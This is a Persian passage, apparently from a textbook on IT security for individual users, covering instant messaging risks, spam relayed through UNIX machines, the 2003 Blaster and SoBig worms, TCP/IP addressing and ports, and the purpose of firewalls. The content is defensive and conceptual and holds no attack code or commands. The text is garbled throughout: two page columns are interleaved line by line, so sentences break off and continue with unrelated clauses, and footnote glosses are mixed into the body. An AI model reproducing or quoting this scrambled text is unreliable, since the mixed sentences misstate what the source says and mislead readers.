ﺍﺻﻠﻲ ﺷﻤﺎ ﭘﻨﻬﺎﻥ ﺑﻤﺎﻧﺪ ،ﺍﮔﺮﭼﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻭ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ
ﺑﺘﻮﺍﻧﻨﺪ ﻫﻮﻳﺖ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺁﺩﺭﺱ IPﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ. ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ،ﻭ ﻧﺎﻣﻬـﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـﺎﻱ
101 Internet Relay Chat
102 AOL Instant Messenger
۱۰۳ﻳﻚ ﻋﻼﻣﺖ ﺍﺧﺘﺼﺎﺭﻱ ﺑﺮﺍﻱ ﻋﺒﺎﺭﺕ "" I Seek You 100 File Server
٩١ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻫﻢ ﻛﺎﺭﺑﺮ ﺍﺯ ﻭﺟﻮﺩ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺁﮔﺎﻩ ﻧﻴﺴﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑـﺮﺍﻱ ﻗﺎﻧﻮﻥ ﻫﺠﺪﻫﻢ:
ﭼﻨﺪﻳﻦ ﺳﺎﻝ ﻣﺘﻮﺍﻟﻲ ﺑﻌـﻀﻲ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ UNIXﺑﮕﻮﻧـﻪﺍﻱ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻣـﻲ ﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ ﻣﻔﻴـﺪ
ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻛﻪ ﻫﺮ ﺩﺳﺘﮕﺎﻩ ﻣﺠﻬﺰ ﺑﻪ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻧﺪ ﺑﻌﻨـﻮﺍﻥ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺍﺯ ﺁﻥ ﺑﺎ ﺁﮔﺎﻫﻲ ﻭ ﺩﻗﺖ ﻛﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﻳﻚ ﻣﺮﻛﺰ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻏﻴﺮ ﻣﺤﺪﻭﺩ ﻋﻤﻞ ﻧﻤﺎﻳﺪ )ﺍﻟﺒﺘـﻪ ﺍﮔـﺮ
ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺑـﻪ ﭼﻨـﺪ ﺩﻟﻴـﻞ ﻧﻘـﺶ ﻣﻔﻴـﺪﻱ ﺍﻳﻔـﺎ
ﺍﻳــﻦ ﻗﺎﺑﻠﻴــﺖ ﺗﻮﺳــﻂ ﻛــﺎﺭﺑﺮ ﻏﻴﺮﻓﻌــﺎﻝ ﻧﻤــﻲﺷــﺪ( .ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ ﺑــﻪ
ﻣﻲﻛﻨﺪ:
ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺩ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎ ﺑـﺮﺍﻱ ﺗﻮﺯﻳـﻊ
ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ،ﺑـﺪﻭﻥ ﺁﻧﻜـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺻـﺎﺣﺒﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻧﺴﺒﺖ ﺑﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍﺣـﺖﺗـﺮ ﻭ •
ﺩﺳﺘﮕﺎﻫﻬﺎ ﺍﺯ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ. ﺳﺮﻳﻌﺘﺮ ﺍﺳﺖ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻴﭻ ﺗﺄﺧﻴﺮﻱ ﻧﺪﺍﺭﺩ .ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﺑﺨﺶ ﺩﻭﻡ
ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ -ﺭﺍ ﻧﻴـﺰ ﻣﻲﺗﻮﺍﻧﺴﺖ ۶۵۰۰۰ﻭﻳﺮﻭﺱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ .ﺁﮔﻮﺳﺖ
ﺩﺭﻳﺎﺑﻴﺪ .ﺍﮔﺮ ﺑﺎ ﭘﺮﻭﺗﻜﻞ TCP/IPﺁﺷﻨﺎ ﻫـﺴﺘﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ۲۰۰۳ﺍﺯ ﻧﻈﺮ ﺍﻧﺘﺸﺎﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ ﻣـﺎﻩ ﺟـﺎﻟﺒﻲ ﺑـﻮﺩ،
ﻓﺼﻞ ﺑﻌﺪﻱ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺍﻣﺎ ﺍﮔﺮ ﺁﻧﺮﺍ ﻧﻤﻲﺷﻨﺎﺳﻴﺪ ﺍﺑﺘﺪﺍ ﺿﻤﻴﻤﺔ ﭼﺮﺍﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺮﻣﻬﺎ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺎﻩ ﻣﻨﺘـﺸﺮ ﺷـﺪﻧﺪ ﺍﺯ ﻳـﻚ
۲ﻫﻤﻴﻦ ﺑﺨﺶ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻧﻤﺎﻳﻴـﺪ .ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺣﺘـﻲ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ ﺑــﺴﻴﺎﺭ ﺣﻴــﺎﺗﻲ ﺩﺭ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ Windows
ﺩﺭﺻــﻮﺭﺗﻴﻜﻪ ﻧﺨﻮﺍﻫﻴــﺪ ﺍﻳــﻦ ﺟﺰﺋﻴــﺎﺕ ﺭﺍ ﺑﻴﺎﻣﻮﺯﻳــﺪ ﻫﻤﭽﻨــﺎﻥ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﻲﻛﺮﺩﻧﺪ ) Blasterﻭ SoBigﺍﺯ ﺭﺍﻳﺠﺘﺮﻳﻦ ﺁﻧﻬﺎ ﺑﻮﺩﻧـﺪ(.
ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺩﺭ ﺍﺩﺍﻣﻪ ﺗﻤـﺎﻣﻲ ﺁﻧﭽـﻪ ﻳﻜﻤﺎﻩ ﭘﻴﺸﺘﺮ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺮﺍﻱ ﺁﻥ ﻭﺻﻠﻪﺍﻱ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﺑﻮﺩ،
ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺧﻼﺻﻪ ﺩﺭ ﻣﻮﺭﺩ TCP/IPﺑﺪﺍﻧﻴﺪ ﺫﻛـﺮ ﺍﻣﺎ ﺍﻓﺮﺍﺩ ﻛﻤﻲ ﺁﻧﺮﺍ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻛﺮﻣﻬﺎﻱ
ﻣﻲﺷﻮﺩ: ﺟﺪﻳﺪ ﺗﻮﺍﻧـﺴﺘﻨﺪ ﺑـﻪ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﺁﺳـﻴﺐ ﺑﺰﻧﻨـﺪ ﻭ ﺑـﻪ
ﺳﺮﻋﺖ ﺩﺭ ﺁﻧﻬﺎ ﭘﺨﺶ ﺷﻮﻧﺪ؛ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺷﺎﻳﺪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ
ﺩﺳﺘﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ ﺩﺍﺭﺍﻱ ﻳـﻚ •
ﺭﻛﻮﺭﺩﻫﺎﻱ ﺟﺪﻳﺪﻱ ﺑﻪ ﺛﺒﺖ ﺭﺳﻴﺪﻩ ﺑﺎﺷﺪ .ﺩﺭ ﺷﻠﻮﻏﺘﺮﻳﻦ ﺭﻭﺯ ﺁﻥ
ﺁﺩﺭﺱ IPﺑﻪ ﺷﻜﻞ 12.222.103.43ﻣﻲ ﺑﺎﺷﻨﺪ ﻛـﻪ
ﻣﺎﻩ ،ﻭﻳﺮﻭﺱﻳﺎﺏ Nortonﺣﺪﻭﺩ ۵۰ﻧﺸﺎﻥ ﺟﺪﻳـﺪ ﻭﻳـﺮﻭﺱ ﺭﺍ
ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻣﻲﺑﻴﻨﻴـﺪ ﻣﺘـﺸﻜﻞ ﺍﺯ ﭼﻬـﺎﺭ ﻋـﺪﺩ ﻣﺠـﺰﺍ
ﺑﻪ ﻓﻬﺮﺳﺖ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺧﻮﺩ ﺍﺿﺎﻓﻪ ﻧﻤـﻮﺩ .ﺍﻳـﻦ
ﺍﺳﺖ .ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻣﺴﻴﺮ ﭘﻴﺎﻡ ﺍﺯ ﺍﻳﻦ ﺁﺩﺭﺱ
ﻋﺪﺩ ﺗﺎ ﻳﻜﻤﺎﻩ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺑﻪ ﺣﺪﻭﺩ ۵۲۰ﺭﺳﻴﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﻫﺮ ﺭﺍﻳﺎﻧـﻪ ﺑـﺎ ﺍﺭﺍﺋـﻪ ﺁﺩﺭﺱ ﻣﻘـﺼﺪ ﺩﺭ
ﭼﻨﻴﻦ ﻗﺎﻟﺒﻲ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳـﻦ ﭘﻴﺎﻣﻬـﺎ ﺑﺎﻳـﺪ ﺑـﻪ
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ
ﻛﺠﺎ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ.
ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻤﺎﻣﻲ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺩﺍﺧﻞ ﻳﺎ ﺧـﺎﺭﺝ ﺍﺯ ﺷـﺒﻜﻪ ﺭﺍ
ﺩﺭ ﻫﺮ ﺩﺳـﺘﮕﺎﻩ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺑﻮﺳـﻴﻠﻪ ﺷـﻤﺎﺭﺓ •
١٠٩ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻭ ﺑﺮ ﺍﺳﺎﺱ ﻣﺠﻤﻮﻋﻪ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺟﻮﺩ ﺩﺭ ﺧﻮﺩ ﺑـﻪ
ﭘﻮﺭﺕ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ )ﻣﺎﻧﻨﺪ ﺷـﻤﺎﺭﻩ ﺗﻠﻔﻨﻬـﺎﻱ ﺩﺍﺧﻠـﻲ
ﺗﻠﻔﻦ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ -ﺗﻨﻬﺎ ﻳﻚ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻦ ﻋﻤـﻮﻣﻲ ﻭﺟـﻮﺩ ﺗﺮﺍﻓﻴﻚ ١٠٧ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺷﺒﻜﻪ ﻋﺒﻮﺭ ﻛﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﻣﺘﻮﻗـﻒ
ﺩﺍﺭﺩ ،ﺍﻣﺎ ﻫﺮ ﺍﺗﺎﻕ ﺷﻤﺎﺭﺓ ﺩﺍﺧﻠﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺩ(. ﻣﻲﺳﺎﺯﺩ .ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻜﻞ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ
ﻧﺼﺐ ﺷﻮﺩ ﻳﺎ ﻗﺴﻤﺘﻲ ﺍﺯ ﺗﺠﻬﻴـﺰﺍﺕ ﻣﻴـﺎﻥ ﺭﺍﻳﺎﻧـﻪ )ﻳـﺎ ﮔﺮﻭﻫـﻲ ﺍﺯ
ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﻳـﺎ ﺍﺯ ﺁﻥ ﻓﺮﺳـﺘﺎﺩﻩ ﻣـﻲﺷـﻮﻧﺪ، •
ﻱ ﺁﻥ ﺑﺎﺷﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﺭﺍﻳﺎﻧﻪﻫﺎ( ﻭ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍ ﹺ
ﺑﺴﺘﻪ ١١٠ﻧﺎﻡ ﺩﺍﺭﻧﺪ. ١٠٨
ﺩﺭ ﺑﻌــﻀﻲ ﺗﺠﻬﻴــﺰﺍﺕ ﺩﻳﮕــﺮ ﻣﺎﻧﻨــﺪ ﻣــﺴﻴﺮﻳﺎﺑﻬﺎ ﻗــﺮﺍﺭ ﺩﺍﺩﻩ
ﺍﺯ ﻛﻠﻤﺎﺕ TCPﻭ UDPﺩﺭ ﺑﺤﺚ ﺯﻳـﺮ ﭼـﺸﻢ ﭘﻮﺷـﻲ • ﻻ ﺭﺍﻳﮕــﺎﻥ ﻭ
ﻣــﻲﺷــﻮﺩ .ﺍﻳــﻦ ﻧــﻮﻉ ﺩﻳــﻮﺍﺭﻩﻫــﺎﻱ ﺁﺗــﺶ ﻣﻌﻤــﻮ ﹰ
ﻛﻨﻴﺪ ﻭ ﭼﻨﺪﺍﻥ ﻧﮕﺮﺍﻥ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺟﺰﺋﻴﺎﺕ ﻧﺒﺎﺷﻴﺪ. ﺍﺯ ﭘﻴﺶ ﻧﺼﺐﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭﺟﻮﺩ
ﺩﺍﺭﻧﺪ.
ﭼﺮﺍ ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﻴﺎﺯ ﺩﺍﺭﻳﻢ؟
ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﻪ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻴﺴﺖ ﻧﻴﺎﺯﻱ ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﺳﻮﻡ:
ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﺪﺍﺭﻳﺪ .ﻫﻤﻴﻨﻜﻪ ﺑﻪ ﺷـﺒﻜﻪ ﻣﺘـﺼﻞ ﺷـﻮﻳﺪ ﺍﻳـﻦ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ
ﺍﺣﺘﻤــﺎﻝ ﭘﺪﻳــﺪ ﻣــﻲﺁﻳــﺪ ﻛــﻪ ﻣﻬــﺎﺟﻤﻴﻦ ﺭﺍﻳﺎﻧــﺔ ﺷــﻤﺎ ﺭﺍ ﻣــﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ ﻛﻪ ﻣﻲ ﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺼﻮﺭﺕ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ: ﺩﺭ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻧﺼﺐ ﻧﻤﻮﺩ ﻳـﺎ ﺑـﺼﻮﺭﺕ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ
ﺁﺗﺶ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻗـﺮﺍﺭ
ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ،ﺍﺷﺘﺮﺍﻙ ﭼﺎﭘﮕﺮ ﻳـﺎ ﺳـﺎﻳﺮ ﺧـﺪﻣﺎﺕ •
ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ ،ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺭﻭﻱ ﭘﻮﺭﺗﻬـﺎﻱ ﺩﺍﺩ.
ﻣﺸﺨﺼﻲ ﺑﻪ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺍﻳﺴﺘﺪ )ﺩﺭ ﺍﺻﻄﻼﺡ ﮔﻔﺘﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺎ ﺩﺭﻙ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﭼﻪ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫـﺪ
ﺭﺍﻳﺎﻧــﻪ ﺁﻥ ﭘــﻮﺭﺕ ﺭﺍ "ﻣــﻲﺷــﻨﻮﺩ"( .ﺍﮔﺮﭼــﻪ ﺑــﺎ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﻭ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻗﻮﺍﻧﻴﻨﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺁﻥ ﺗﻨﻈـﻴﻢ ﻧﻤـﻮﺩ ﺑﺎﻳـﺪ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺑـﺎ ﺭﺍﻳﺎﻧـﺔ ﺩﻳﮕـﺮﻱ ﺑـﻪﺍﺷـﺘﺮﺍﻙ ﻣﻔﻬﻮﻡ ﭘﺮﻭﺗﻜـﻞ - TCP/IPﻣﺠﻤﻮﻋـﻪ ﻗـﻮﺍﻧﻴﻨﻲ ﻛـﻪ ﺗﻤـﺎﻣﻲ
109 Port Number ۱۰۷ﻣﻨﻈﻮﺭ ﺍﻃﻼﻋﺎﺕ ﺗﺒﺎﺩﻝ ﺷﺪﻩ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﺳﺖ
110 Packet 108 Router
٩٥ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺁﺩﺭﺱ IPﻣﺒﺪﺃ ﺁﻥ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺑﺎﺷـﺪ ﺑﮕﺬﺍﺭﻳﺪ ،ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕـﺮﻱ ﺩﺭ ﻫـﺮ ﻧﻘﻄـﺔ
ﻛﻪ ﺷﻤﺎ ﻣﺎﻳﻠﻴﺪ ﺍﺯ ﺧﺪﻣﺎﺕ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ. ﺩﻧﻴﺎ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻧﻤﺎﻳﺪ.
ﻣﻲﺗﻮﺍﻧﻴﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﻃﻤﻴﻨﺎﻧﻲ ﻛـﻪ ﺑـﻪ • ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴـﺪ ﺭﻭﻱ ﭘﻮﺭﺗﻬـﺎﻱ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺑـﻪ ﺍﻧﺘﻈـﺎﺭ •
ﺷﺒﻜﻪ ﺁﺳﻴﺐ ﻧﻤﻲﺭﺳﺎﻧﻨﺪ ﺭﺍ ﺑﺮﺍﻱ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺗﻌﺮﻳـﻒ ﺑﺎﻳﺴﺘﻴﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺍﺷﻜﺎﻻﺕ ،ﺷﺨﺼﻲ
ﻛﻨﻴﺪ ﺗﺎ ﺗﻨﻬﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻄﻤﺌﻦ ﺑﺘﻮﺍﻧﻨﺪ ﺑـﺎ ﺷـﻤﺎ ﺍﺭﺗﺒـﺎﻁ ﺑﺘﻮﺍﻧﺪ ﺑﺮﺍﻳﺘﺎﻥ ﭘﻴﺎﻡ ﻣﺎﻫﺮﺍﻧـﻪﺍﻱ ﺑﻔﺮﺳـﺘﺪ ﻭ ﺍﺯ ﺁﻥ ﻃﺮﻳـﻖ
ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪ .ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﺎﻥ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺳـﺎﻳﺮ ﺍﻋﻤﺎﻝ ﻣﺨﺮﺑﻲ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺎﻧﻨﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻧﻴـﺰ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺷﺪﻩ ﺍﺳﺖ.
ﺑﺨﺶ ﺩﻭﻡ
ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻴﺪ ،ﺍﻣﺎ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺷﻤﺎ ﺑﺎﻳﺪ ﺁﻏﺎﺯ ﻛﻨﻨﺪﺓ ﺣﺘﻲ ﺍﮔﺮ ﻧﺘﻮﺍﻧﻴﺪ ﺭﻭﻱ ﻫﻴﭻ ﭘﻮﺭﺗﻲ ﻣﻨﺘﻈـﺮ ﭘﻴـﺎﻡ ﺑﻤﺎﻧﻴـﺪ •
ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺑﺎﺷﻴﺪ. ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻫﻤﭽﻨﺎﻥ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﭘﻴﺎﻣﻬـﺎﻱ ﺯﻳـﺎﺩﻱ
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﻣﻨـﺎﺑﻊ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺑﻜـﺎﺭ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ .ﺍﮔﺮﭼﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺗﻤﺎﻣﻲ ﺁﻧﻬـﺎ
ﻣﻲﮔﻴﺮﻧﺪ ،ﺍﻣﺎ ﺑﺎ ﺍﻳﻦ ﻣﺰﻳﺖ ﻛﻪ ﺗﻨﻬﺎ ﻣﺤﺘﻮﺍﻱ ﺍﻃﻼﻋﺎﺕ )ﻫﻤﺮﺍﻩ ﺑﺎ ﺻﺮﻓﻨﻈﺮ ﻛﺮﺩ ﺍﻣﺎ ﭘﻴﺎﻣﻬﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺷـﺒﻜﻪﺍﻱ
ﺁﺩﺭﺳﻬﺎ ﻭ ﭘﻮﺭﺗﻬﺎﻱ ﻓﺮﺳﺘﻨﺪﻩ ﻳﺎ ﮔﻴﺮﻧﺪﺓ ﺁﻥ( ﺭﺍ ﺑﺮﺭﺳﻲ ﻧﻤﻲﻛﻨﻨﺪ؛ ﺑﻠﻜـﻪ ﺷﻤﺎ ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﻨﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﻧﺘﻮﺍﻧﻴﺪ ﻛﺎﺭﻫﺎﻱ ﺧﻮﺩ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﺑﺮﻧﺎﻣﻪﺍﻱ ﭘﻴﺎﻡ ﺭﺍ ﺍﺭﺳـﺎﻝ ﻧﻤـﻮﺩﻩ ﺭﺍ ﺍﻧﺠــﺎﻡ ﺩﻫﻴــﺪ )ﺩﺭ ﺍﻳــﻦ ﻣــﻮﺭﺩ ﻓﻘــﻂ ﺩﻳــﻮﺍﺭﻩﻫــﺎﻱ ﺁﺗــﺶ
